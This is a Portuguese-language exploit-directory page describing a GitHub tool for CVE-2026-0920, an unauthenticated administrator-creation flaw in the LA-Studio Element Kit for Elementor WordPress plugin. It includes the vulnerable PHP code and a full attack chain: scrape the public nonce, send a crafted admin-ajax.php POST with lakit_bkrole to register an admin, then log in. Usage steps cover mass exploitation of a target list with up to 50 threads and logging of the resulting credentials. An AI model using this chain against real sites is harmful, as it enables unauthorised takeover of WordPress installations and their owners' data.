Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-0920-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebAprendizado e Educação
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole

Ver Repositório
216há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalação de Privilégios Não Autenticada via Backdoor para Criação de Usuário Administrativo via parâmetro lakit_bkrole

   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 O exploit chega aqui primeiro. Siga @KNxploited no Telegram — seu feed de elite com CVEs recém-divulgadas, PoCs funcionais e pesquisa de segurança de precisão. Atualizado incansavelmente. Feito para quem está à frente.


🧠 Visão Geral

CVE-2026-0920 é uma vulnerabilidade Crítica com CVSS 9.8 descoberta no plugin WordPress LA-Studio Element Kit for Elementor.

A falha reside na função ajax_register_handle(), que processa registros de usuários não autenticados via AJAX. A função não impõe nenhuma restrição ao parâmetro lakit_bkrole — permitindo que um atacante totalmente não autenticado atribua a si mesmo o papel administrator durante o registro, obtendo a assunção total do admin do WordPress em uma única requisição.

CampoDetalhes
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versões AfetadasTodas as versões até 1.5.6.3 inclusive
Tipo de VulnerabilidadeEscalação de Privilégios Não Autenticada / Criação de Admin
Vetor de AtaqueRede — Nenhuma Autenticação Necessária
Pontuação CVSS 3.19.8 CRÍTICA
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoAssunção Total do Administrador do WordPress
PesquisadorNxploited

💀 Análise Aprofundada da Vulnerabilidade

A causa raiz é a ausência de uma verificação de capacidade de papel dentro do manipulador de registro AJAX do plugin:

// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Por que isso é crítico:

  • wp_ajax_nopriv_* = acessível por qualquer pessoa sem nenhuma autenticação
  • lakit_bkrole aceita qualquer string de papel do WordPress — incluindo administrator
  • Uma única requisição POST cria uma conta de administrador com privilégios totais
  • O nonce necessário é exposto publicamente no HTML/JS do front-end do site
  • Sem limite de taxa, sem imposição de CAPTCHA por padrão, sem verificação de e-mail necessária

⚔️ Cadeia de Exploração

Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisitos

pip install requests colorama
DependênciaFinalidade
requestsRequisições HTTP, gerenciamento de sessão e cookies
coloramaSaída colorida no terminal em todas as plataformas
threadingProcessamento concorrente de múltiplos alvos
reExtração de nonce baseada em regex a partir de HTML/JS

Python 3.10+ recomendado (usa type hints de união str | None).


📂 Estrutura de Arquivos

CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Uso

Passo 1 — Configurar as Credenciais (Opcional)

Abra o arquivo CVE-2026-0920.py e edite as constantes no topo para definir os dados desejados da conta de administrador:

ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Passo 2 — Preparar os Alvos

Crie um arquivo list.txt com uma URL de alvo por linha:

https://target1.com
https://target2.com
http://target3.com

URLs sem esquema recebem automaticamente o prefixo https://.


Passo 3 — Executar o Exploit

python CVE-2026-0920.py

Você verá os seguintes prompts:

Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Passo 4 — Monitorar a Saída ao Vivo

O script produz uma saída de terminal em tempo real e com código de cores:

Baixar ferramenta